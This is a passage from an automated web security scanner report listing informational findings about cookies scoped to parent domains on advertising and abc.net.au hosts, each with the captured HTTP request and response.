Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:14:10 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<iframe src="http://view.atdmt.com/BVK/iview/349019757/direct/01/7542530158?click=http://r1-ads.ace.advertising.com/click/site=0000801645/mnum=0001069538/cstr=18256183=_4e677c31,754253
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=801647/size=300250/u=2/bnum=35058392/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.perthnow.com.au%252F

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:14:13 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=801647/size=300250/u=2/bnum=35058392/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.perthnow.com.au%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.905406.801647.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 07 Sep 2011 14:14:13 GMT
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Date: Wed, 07 Sep 2011 14:14:13 GMT
Content-Length: 898
Connection: close
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:14:13 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script type="text/javascript">document.write(\'<ifr\'+\'ame width="300" height="250" src="http://web.adblade.com/imps.php?app=3695&ad_width=300&ad_height=250&title_font=1&title_color=
...[SNIP]...

8.55. http://rc.d.chango.com/m/rc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rc.d.chango.com
Path:	/m/rc

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_t=b6ae888c-d95b-11e0-b096-0025900e0834; Domain=chango.com; expires=Sat, 04 Sep 2021 14:14:35 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m/rc HTTP/1.1
Host: rc.d.chango.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7856/12590
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: Chango RTB Server
Location: http://pixel.rubiconproject.com/tap.php?expires=30&nid=2245&put=b6ae888c-d95b-11e0-b096-0025900e0834&v=7727
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834; Domain=chango.com; expires=Sat, 04 Sep 2021 14:14:35 GMT; Path=/
Set-Cookie: _i_rc=1; Domain=chango.com; expires=Wed, 14 Sep 2011 14:14:35 GMT; Path=/
Connection: close

8.56. http://rp.gwallet.com/r1/ruum previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rp.gwallet.com
Path:	/r1/ruum

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ra1_uid=4711648038188259648; Expires=Thu, 06-Sep-2012 14:14:19 GMT; Path=/; Domain=gwallet.com; Version=1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r1/ruum HTTP/1.1
Host: rp.gwallet.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7856/12590
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ra1_uid=4711648038188259648; ra1_oo=1

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: application/octet-stream
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Location: http://pixel.rubiconproject.com/tap.php?v=7935&nid=2271&expires=30&put=DUSYkUQpjy1LEYeYEnMS6srZRiE
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4711648038188259648; Expires=Thu, 06-Sep-2012 14:14:19 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=j5; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=19; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1

8.57. http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tap.rubiconproject.com
Path:	/oz/feeds/invite-media-rtb/tokens/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

cd=false; Domain=.rubiconproject.com; Expires=Thu, 06-Sep-2012 14:14:43 GMT; Path=/
lm="7 Sep 2011 14:14:43 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /oz/feeds/invite-media-rtb/tokens/?rt=iframe HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7856/12590
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; ses15=12338^2&12590^2; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; rdk=7856/12590; rdk2=0; ses2=12338^3&12590^1; csi2=3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061

Response

HTTP/1.1 302 Moved Temporarily
Date: Wed, 07 Sep 2011 14:14:43 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Location: http://pixel.invitemedia.com/rubicon_sync?publisher_user_id=f772ba986ce1d14ae944dfcb2540fa9b434bfac6&publisher_dsp_id=2101&publisher_call_type=iframe&publisher_redirecturl=http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/
Content-Length: 0
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Thu, 06-Sep-2012 14:14:43 GMT; Path=/
Set-Cookie: dq=3|3|0|0; Expires=Thu, 06-Sep-2012 14:14:43 GMT; Path=/
Set-Cookie: put_2101=""; Domain=.rubiconproject.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: lm="7 Sep 2011 14:14:43 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Connection: close
Content-Type: text/plain; charset=UTF-8

8.58. http://tap.rubiconproject.com/oz/feeds/targus/profile previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tap.rubiconproject.com
Path:	/oz/feeds/targus/profile

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

cd=false; Domain=.rubiconproject.com; Expires=Thu, 06-Sep-2012 14:15:54 GMT; Path=/
lm="7 Sep 2011 14:15:54 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /oz/feeds/targus/profile?p=targus&oz_source=partner&segment=000&zip=&dob=&gender=&pc= HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7856/12590
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; csi2=3151648.js^1^1315404875^1315404875&3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; cd=false; dq=2|2|0|0; lm="7 Sep 2011 14:14:36 GMT"; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; rdk15=1; ses15=12338^3&12590^3; csi15=3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; rdk=7856/12590; rdk2=0; ses2=12338^3&12590^2

Response

HTTP/1.1 204 No Content
Date: Wed, 07 Sep 2011 14:15:54 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Thu, 06-Sep-2012 14:15:54 GMT; Path=/
Set-Cookie: dq=98|98|0|0; Expires=Thu, 06-Sep-2012 14:15:54 GMT; Path=/
Set-Cookie: lm="7 Sep 2011 14:15:54 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

8.59. http://user.lucidmedia.com/clicksense/user previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://user.lucidmedia.com
Path:	/clicksense/user

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

2=38yalGDMfLj; Domain=.lucidmedia.com; Expires=Thu, 06-Sep-2012 14:14:19 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clicksense/user?p=9ce688505699aefa&r=1 HTTP/1.1
Host: user.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7856/12590
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=38yalGDMfLj

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
Pragma: no-cache
Date: Wed, 07 Sep 2011 14:14:19 GMT
Expires: Wed, 07 Sep 2011 14:14:19 GMT
P3P: CP="NOI ADM DEV CUR"
X-Handled-By: awswrh09/127.0.0.1
Set-Cookie: 2=38yalGDMfLj; Domain=.lucidmedia.com; Expires=Thu, 06-Sep-2012 14:14:19 GMT; Path=/
Location: http://pixel.rubiconproject.com/tap.php?v=4214&nid=1197&put=3620501663059719663&expires=30
Content-Length: 0
Connection: close

8.60. http://www.abc.net.au/includes/scripts/global.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/includes/scripts/global.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ABCGuestID=80.67.74.139.103791315404853301; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /includes/scripts/global.js HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 10 Aug 2011 05:58:03 GMT
ETag: "11d7ab-4df7-5d0310c0"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=54212
Expires: Thu, 08 Sep 2011 05:17:45 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Content-Length: 19959
Connection: close
Set-Cookie: ABCGuestID=80.67.74.139.103791315404853301; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

// Assigns webtrends groups to pages by hostname or top level directory.
// Geoff Pack, June 2008
// last modified May 2011

var abcHost = location.host;
if (location.host.indexOf('www.') == 0) abcHo
...[SNIP]...

8.61. http://www.abc.net.au/local/global_css/common_modules/house_ads_m12.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/local/global_css/common_modules/house_ads_m12.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ABCGuestID=80.67.74.139.103791315404853207; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/global_css/common_modules/house_ads_m12.css HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 20 May 2011 01:57:21 GMT
ETag: "3c7da1-1b97-7136e240"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 7063
Cache-Control: max-age=9814
Expires: Wed, 07 Sep 2011 16:57:47 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ABCGuestID=80.67.74.139.103791315404853207; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

.house_ads .image {
   margin: 0 10px 0 0;
}

.house_ads .image .caption {
   display: none;
}

.house_ads .text {
   margin: 0 0 10px 0;
}

.house_ads .text .heading {
   margin: 3px 0 10px 0;
...[SNIP]...

8.62. http://www.abc.net.au/local/global_css/common_modules/latest_media_m21.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/local/global_css/common_modules/latest_media_m21.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ABCGuestID=80.67.74.139.103791315404853217; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/global_css/common_modules/latest_media_m21.css HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 02 Feb 2010 00:14:29 GMT
ETag: "13e5575-474-fc3ca340"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 1140
Cache-Control: max-age=54192
Expires: Thu, 08 Sep 2011 05:17:25 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ABCGuestID=80.67.74.139.103791315404853217; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

#latest_media {
margin-bottom: 20px;
}

#latest_media .title h2 {
padding: 0 0 5px 0;
}

#latest_media .tabslm {
width: 220px;
border-bottom: 4px solid #396789;
}

#latest_media .
...[SNIP]...

8.63. http://www.abc.net.au/local/global_css/common_modules/m60_login.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/local/global_css/common_modules/m60_login.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ABCGuestID=80.67.74.139.103791315404853234; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/global_css/common_modules/m60_login.css HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 22 Jun 2011 00:57:53 GMT
ETag: "c8b8f3-b6a-754ee640"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 2922
Cache-Control: max-age=29877
Expires: Wed, 07 Sep 2011 22:32:10 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ABCGuestID=80.67.74.139.103791315404853234; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

/* @import url("http://www.abc.net.au/pluck/demos/login/screen.css"); */

#abc_pluck-error {
   color: #EF461C;
}

#abc_pluck-login, #my-login {
   width: 220px;
   margin: 0;
}

#abc_pluck-logi
...[SNIP]...

8.64. http://www.abc.net.au/local/global_css/common_modules/river_of_content_m20.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/local/global_css/common_modules/river_of_content_m20.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ABCGuestID=80.67.74.139.103791315404853184; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/global_css/common_modules/river_of_content_m20.css HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 04 Aug 2011 04:12:02 GMT
ETag: "123fcc1-4721-2ed1a880"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 18209
Cache-Control: max-age=68101
Expires: Thu, 08 Sep 2011 09:09:14 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ABCGuestID=80.67.74.139.103791315404853184; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

/* Temp - New defaults - update older styles */

.river_of_content .image {
   width: 100px;
   min-height: 10px;
   padding: 0 10px 0 0;
}

.river_of_content .image img {
   width: 100px;
}

.riv
...[SNIP]...

8.65. http://www.abc.net.au/local/global_css/common_modules/site_search_m3.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/local/global_css/common_modules/site_search_m3.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ABCGuestID=80.67.74.139.103791315404853181; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/global_css/common_modules/site_search_m3.css HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 19 May 2011 05:14:54 GMT
ETag: "13e5586-40f-15ddef80"
Accept-Ranges: bytes
Content-Type: text/css
Vary: Accept-Encoding
Cache-Control: max-age=24849
Expires: Wed, 07 Sep 2011 21:08:22 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Content-Length: 1039
Connection: close
Set-Cookie: ABCGuestID=80.67.74.139.103791315404853181; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

/* Search Function */

.search {
   width:220px;
   background: url(../../global_img/generic/bg_searchFunction.png) no-repeat bottom;
}

.search h3 {
   padding:8px 8px 5px;
   background: url(../../
...[SNIP]...

8.66. http://www.abc.net.au/local/global_css/common_modules/top_stories_m14.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/local/global_css/common_modules/top_stories_m14.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ABCGuestID=80.67.74.139.103791315404852891; expires=Wed, 07-Sep-2011 14:44:12 GMT; path=/; domain=abc.net.au

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/global_css/common_modules/top_stories_m14.css HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 19 May 2011 03:12:20 GMT
ETag: "17ec439-c2c-5f88cd00"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 3116
Cache-Control: max-age=21595
Expires: Wed, 07 Sep 2011 20:14:07 GMT
Date: Wed, 07 Sep 2011 14:14:12 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ABCGuestID=80.67.74.139.103791315404852891; expires=Wed, 07-Sep-2011 14:44:12 GMT; path=/; domain=abc.net.au

/* Top stories module */

.top_stories {
   background: #fff;
   width: 700px;
   padding-bottom: 10px;
   text-align: left;
   overflow: hidden;
}

.top_stories h2 {
   padding: 0 0 10px 0;
   font-siz
...[SNIP]...

8.67. http://www.abc.net.au/local/global_css/news/styles.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/local/global_css/news/styles.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ABCGuestID=80.67.74.139.103791315404852896; expires=Wed, 07-Sep-2011 14:44:12 GMT; path=/; domain=abc.net.au

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/global_css/news/styles.css HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 03 May 2011 03:47:45 GMT
ETag: "11d9ee7-e7-bbba40"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 231
Cache-Control: max-age=21717
Expires: Wed, 07 Sep 2011 20:16:09 GMT
